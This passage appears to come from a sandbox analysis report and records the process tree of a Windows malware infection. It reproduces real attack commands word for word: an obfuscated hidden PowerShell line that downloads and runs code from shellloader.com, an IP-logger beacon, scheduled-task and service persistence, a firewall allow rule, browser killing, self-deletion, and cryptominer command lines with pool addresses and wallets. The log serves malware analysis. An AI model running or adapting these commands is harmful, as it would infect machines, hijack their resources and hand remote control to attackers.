        "C:\Windows\System32\cmd.exe" /c taskkill /im "rbcFPFwtfjtRdNsYtQOaAmG6.exe" /f & erase "C:\Users\Admin\Documents\rbcFPFwtfjtRdNsYtQOaAmG6.exe" & exit
        7⤵
        
        PID:6980
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "rbcFPFwtfjtRdNsYtQOaAmG6.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:5920
      - C:\Users\Admin\Documents\rXPk4TSLmkZxrpqjxILebbx3.exe
        
        "C:\Users\Admin\Documents\rXPk4TSLmkZxrpqjxILebbx3.exe"
        6⤵
        
        PID:6292
      - C:\Users\Admin\Documents\S2E0jNimMQ0mP46U9Ibhk8LR.exe
        
        "C:\Users\Admin\Documents\S2E0jNimMQ0mP46U9Ibhk8LR.exe"
        6⤵
        
        PID:6352
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\S2E0jNimMQ0mP46U9Ibhk8LR.exe"
        7⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:1744
      - C:\Users\Admin\Documents\NRKdhu3FjwEYxWuqX1GM9tmX.exe
        
        "C:\Users\Admin\Documents\NRKdhu3FjwEYxWuqX1GM9tmX.exe"
        6⤵
        
        PID:6772
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
        7⤵
        
        PID:6900
        
        C:\Users\Admin\AppData\Local\Temp\f.exe
        
        "f.exe"
        8⤵
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\237843444.exe
        
        "C:\Users\Admin\AppData\Local\237843444.exe"
        9⤵
        
        PID:7956
        
        C:\Users\Admin\AppData\Local\Temp\wwi.exe
        
        "wwi.exe"
        8⤵
        
        PID:3468
        
        C:\Users\Admin\AppData\Local\Temp\wwl.exe
        
        "wwl.exe"
        8⤵
        
        PID:6480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
        8⤵
        
        PID:6564
      - C:\Users\Admin\Documents\gwoI9cbYOZOkJu8BtGJ9beIv.exe
        
        "C:\Users\Admin\Documents\gwoI9cbYOZOkJu8BtGJ9beIv.exe"
        6⤵
        
        PID:6164
      - C:\Users\Admin\Documents\M9mz0NBIx4WXR5ve6tIic_At.exe
        
        "C:\Users\Admin\Documents\M9mz0NBIx4WXR5ve6tIic_At.exe"
        6⤵
        
        PID:6124
        
        C:\Users\Admin\AppData\Roaming\3993501.scr
        
        "C:\Users\Admin\AppData\Roaming\3993501.scr" /S
        7⤵
        
        PID:8152
        
        C:\Users\Admin\AppData\Roaming\7947245.scr
        
        "C:\Users\Admin\AppData\Roaming\7947245.scr" /S
        7⤵
        
        PID:3128
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1924
    - - C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun1908b94df837b3158.exe
        
        Sun1908b94df837b3158.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        
        PID:1780
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2084
    - - C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun19de8ff4b6aefeb8.exe
        
        Sun19de8ff4b6aefeb8.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:3216
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 656
        6⤵
        Program crash
        
        PID:5024
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 672
        6⤵
        Program crash
        
        PID:2532
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 676
        6⤵
        Program crash
        
        PID:4232
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 668
        6⤵
        Program crash
        
        PID:5248
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 904
        6⤵
        Program crash
        
        PID:6052
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 860
        6⤵
        Program crash
        
        PID:5028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2264
    - - C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun191101c1aaa.exe
        
        Sun191101c1aaa.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3576
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        
        PID:4836
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:5568
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:5168
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        
        PID:4592
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:5524
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:4740
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:7452
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:6716
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        
        PID:4996
        
        C:\ProgramData\6729350.exe
        
        "C:\ProgramData\6729350.exe"
        8⤵
        
        PID:1560
        
        C:\ProgramData\8207374.exe
        
        "C:\ProgramData\8207374.exe"
        8⤵
        
        PID:60
        
        C:\ProgramData\2626855.exe
        
        "C:\ProgramData\2626855.exe"
        8⤵
        
        PID:5100
        
        C:\ProgramData\2626855.exe
        
        "C:\ProgramData\2626855.exe"
        9⤵
        
        PID:3172
        
        C:\ProgramData\4064345.exe
        
        "C:\ProgramData\4064345.exe"
        8⤵
        
        PID:5436
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        
        PID:3608
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3608 -s 1532
        8⤵
        Program crash
        
        PID:6084
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:4876
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 728
        8⤵
        Program crash
        
        PID:5676
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 940
        8⤵
        Program crash
        
        PID:5948
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 956
        8⤵
        Program crash
        
        PID:1312
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 960
        8⤵
        Program crash
        
        PID:5472
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 944
        8⤵
        Program crash
        
        PID:4476
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1052
        8⤵
        Program crash
        
        PID:6132
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 944
        8⤵
        Program crash
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        7⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        
        PID:5540
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5540 -s 1528
        8⤵
        Program crash
        
        PID:6008
        
        C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
        7⤵
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\tmpDF69_tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpDF69_tmp.exe"
        8⤵
        
        PID:5964
        
        C:\Users\Admin\AppData\Local\Temp\tmpDF69_tmp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tmpDF69_tmp.exe
        9⤵
        
        PID:6376
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Local\Temp\is-4UQ0U.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4UQ0U.tmp\setup_2.tmp" /SL5="$30286,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        
        PID:5156
        
        C:\Users\Admin\AppData\Local\Temp\is-Q83SP.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q83SP.tmp\setup_2.tmp" /SL5="$302A8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        
        PID:1848
        
        C:\Users\Admin\AppData\Local\Temp\is-RNM5H.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-RNM5H.tmp\postback.exe" ss1
        11⤵
        
        PID:7124
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        12⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        13⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        14⤵
        
        PID:1500
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dll"
        13⤵
        
        PID:6716
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dll"
        14⤵
        
        PID:7532
        
        C:\Windows\system32\regsvr32.exe
        
        /s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dll"
        15⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dllRFsMIiYMa.dll"
        13⤵
        
        PID:8796
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dllRFsMIiYMa.dll"
        14⤵
        
        PID:9192
        
        C:\Windows\system32\regsvr32.exe
        
        /s "C:\Users\Admin\AppData\Local\Temp\HqK9Rj4HL.dllRFsMIiYMa.dll"
        15⤵
        
        PID:8240
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        
        PID:5652
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        
        PID:4148
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:5832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
      4⤵
      PID:2496
    - - C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun19eb40faaaa9.exe
        
        Sun19eb40faaaa9.exe
        5⤵
        Executes dropped EXE
        
        PID:1952
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Sun19eb40faaaa9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun19eb40faaaa9.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:4364
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Sun19eb40faaaa9.exe /f
        7⤵
        Kills process with taskkill
        
        PID:5432
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:5296
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
      4⤵
      PID:2604
    - - C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun198361825f4.exe
        
        Sun198361825f4.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1488
      - C:\Users\Admin\AppData\Local\Temp\tmpE644_tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpE644_tmp.exe"
        6⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\tmpE644_tmp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tmpE644_tmp.exe
        7⤵
        
        PID:2804
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
      4⤵
      PID:3612
    - - C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun1966fb31dd5a07.exe
        
        Sun1966fb31dd5a07.exe
        5⤵
        Executes dropped EXE
        
        PID:3728
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
      4⤵
      PID:3716
    - - C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun195a1614ec24e6a.exe
        
        Sun195a1614ec24e6a.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:492
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
      4⤵
      PID:3044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2540
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2656

C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun193fda712d9f1.exe
Sun193fda712d9f1.exe
1⤵
- Executes dropped EXE
PID:2728

C:\Users\Admin\AppData\Local\Temp\is-DOAPL.tmp\Sun1966fb31dd5a07.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DOAPL.tmp\Sun1966fb31dd5a07.tmp" /SL5="$50032,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun1966fb31dd5a07.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4140
- C:\Users\Admin\AppData\Local\Temp\is-EQAQE.tmp\Ze2ro.exe
  "C:\Users\Admin\AppData\Local\Temp\is-EQAQE.tmp\Ze2ro.exe" /S /UID=burnerch2
  2⤵
  PID:4728
- - C:\Program Files\Microsoft Office\WVKWIQDGJS\ultramediaburner.exe
    "C:\Program Files\Microsoft Office\WVKWIQDGJS\ultramediaburner.exe" /VERYSILENT
    3⤵
    PID:5136
  - - C:\Users\Admin\AppData\Local\Temp\is-U9VVC.tmp\ultramediaburner.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-U9VVC.tmp\ultramediaburner.tmp" /SL5="$2028A,281924,62464,C:\Program Files\Microsoft Office\WVKWIQDGJS\ultramediaburner.exe" /VERYSILENT
      4⤵
      PID:5592
    - - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        5⤵
        
        PID:1008
- - C:\Users\Admin\AppData\Local\Temp\e7-f2dbc-3a1-39986-38d0f631a4eec\Lociwashomae.exe
    "C:\Users\Admin\AppData\Local\Temp\e7-f2dbc-3a1-39986-38d0f631a4eec\Lociwashomae.exe"
    3⤵
    PID:5616
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
      dw20.exe -x -s 1348
      4⤵
      PID:7728
- - C:\Users\Admin\AppData\Local\Temp\45-e27a7-a8d-45ba0-43db74471cb5b\Jajyloshaesho.exe
    "C:\Users\Admin\AppData\Local\Temp\45-e27a7-a8d-45ba0-43db74471cb5b\Jajyloshaesho.exe"
    3⤵
    PID:4884
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pkpplzro.fnl\GcleanerEU.exe /eufive & exit
      4⤵
      PID:7628
    - - C:\Users\Admin\AppData\Local\Temp\pkpplzro.fnl\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\pkpplzro.fnl\GcleanerEU.exe /eufive
        5⤵
        
        PID:7868
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ykyb1n5.rz2\installer.exe /qn CAMPAIGN="654" & exit
      4⤵
      PID:7948
    - - C:\Users\Admin\AppData\Local\Temp\1ykyb1n5.rz2\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\1ykyb1n5.rz2\installer.exe /qn CAMPAIGN="654"
        5⤵
        
        PID:8156
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwkzvskx.gvf\anyname.exe & exit
      4⤵
      PID:2144
    - - C:\Users\Admin\AppData\Local\Temp\kwkzvskx.gvf\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\kwkzvskx.gvf\anyname.exe
        5⤵
        
        PID:7844
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\okkipq2s.ggm\gcleaner.exe /mixfive & exit
      4⤵
      PID:6016
    - - C:\Users\Admin\AppData\Local\Temp\okkipq2s.ggm\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\okkipq2s.ggm\gcleaner.exe /mixfive
        5⤵
        
        PID:7572

C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun1905815e51282417.exe
Sun1905815e51282417.exe
1⤵
- Executes dropped EXE
PID:2664

C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun19262b9e49ad.exe
Sun19262b9e49ad.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
  2⤵
  PID:5760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    PID:480

C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun19e4ade31b2a.exe
Sun19e4ade31b2a.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3820
- C:\Users\Admin\AppData\Roaming\4250079.scr
  "C:\Users\Admin\AppData\Roaming\4250079.scr" /S
  2⤵
  PID:4644
- C:\Users\Admin\AppData\Roaming\2061696.scr
  "C:\Users\Admin\AppData\Roaming\2061696.scr" /S
  2⤵
  PID:2296
- C:\Users\Admin\AppData\Roaming\1032292.scr
  "C:\Users\Admin\AppData\Roaming\1032292.scr" /S
  2⤵
  PID:2004
- - C:\Users\Admin\AppData\Roaming\1032292.scr
    "C:\Users\Admin\AppData\Roaming\1032292.scr"
    3⤵
    PID:4708
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 892
    3⤵
    - Program crash
    PID:3944
- C:\Users\Admin\AppData\Roaming\7314198.scr
  "C:\Users\Admin\AppData\Roaming\7314198.scr" /S
  2⤵
  PID:1124

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3788
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:1452

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7200
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:7272

C:\Users\Admin\AppData\Local\Temp\BE17.exe
C:\Users\Admin\AppData\Local\Temp\BE17.exe
1⤵
PID:4932

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:7312
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2F4C29E1DBB534E80D4943E8275209E8 C
  2⤵
  PID:7768

C:\Users\Admin\AppData\Local\Temp\1DAD.exe
C:\Users\Admin\AppData\Local\Temp\1DAD.exe
1⤵
PID:2224

C:\Users\Admin\AppData\Local\Temp\A7FC.exe
C:\Users\Admin\AppData\Local\Temp\A7FC.exe
1⤵
PID:7136

C:\Users\Admin\AppData\Local\Temp\C1FE.exe
C:\Users\Admin\AppData\Local\Temp\C1FE.exe
1⤵
PID:7304
- C:\Users\Admin\AppData\Local\Temp\C1FE.exe
  C:\Users\Admin\AppData\Local\Temp\C1FE.exe
  2⤵
  PID:8600

C:\Users\Admin\AppData\Local\Temp\137A.exe
C:\Users\Admin\AppData\Local\Temp\137A.exe
1⤵
PID:9124

C:\Users\Admin\AppData\Local\Temp\284B.exe
C:\Users\Admin\AppData\Local\Temp\284B.exe
1⤵
PID:8508
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\284B.exe"
  2⤵
  PID:8776
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:8928

C:\Users\Admin\AppData\Local\Temp\358B.exe
C:\Users\Admin\AppData\Local\Temp\358B.exe
1⤵
PID:2844

C:\Users\Admin\AppData\Local\Temp\AF30.exe
C:\Users\Admin\AppData\Local\Temp\AF30.exe
1⤵
PID:7388
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\skdlpaon\
  2⤵
  PID:9108
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\krpafaoc.exe" C:\Windows\SysWOW64\skdlpaon\
  2⤵
  PID:6392
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create skdlpaon binPath= "C:\Windows\SysWOW64\skdlpaon\krpafaoc.exe /d\"C:\Users\Admin\AppData\Local\Temp\AF30.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:4940
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description skdlpaon "wifi internet conection"
  2⤵
  PID:5004
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start skdlpaon
  2⤵
  PID:7672
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:4364

C:\Users\Admin\AppData\Roaming\tbdcivg
C:\Users\Admin\AppData\Roaming\tbdcivg
1⤵
- Executes dropped EXE
PID:4512

C:\Users\Admin\AppData\Roaming\shdcivg
C:\Users\Admin\AppData\Roaming\shdcivg
1⤵
PID:4704

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8248
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:8800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:8296

C:\Windows\SysWOW64\skdlpaon\krpafaoc.exe
C:\Windows\SysWOW64\skdlpaon\krpafaoc.exe /d"C:\Users\Admin\AppData\Local\Temp\AF30.exe"
1⤵
PID:8500
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:7336
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:8720

C:\Users\Admin\AppData\Local\Temp\CA46.exe
C:\Users\Admin\AppData\Local\Temp\CA46.exe
1⤵
PID:8908

C:\Users\Admin\AppData\Local\Temp\DF7.exe
C:\Users\Admin\AppData\Local\Temp\DF7.exe
1⤵
PID:8436

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:9064
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:8500

C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\UlmJZvC.exe
C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\UlmJZvC.exe W8 /site_id 668658 /S
1⤵
PID:6808
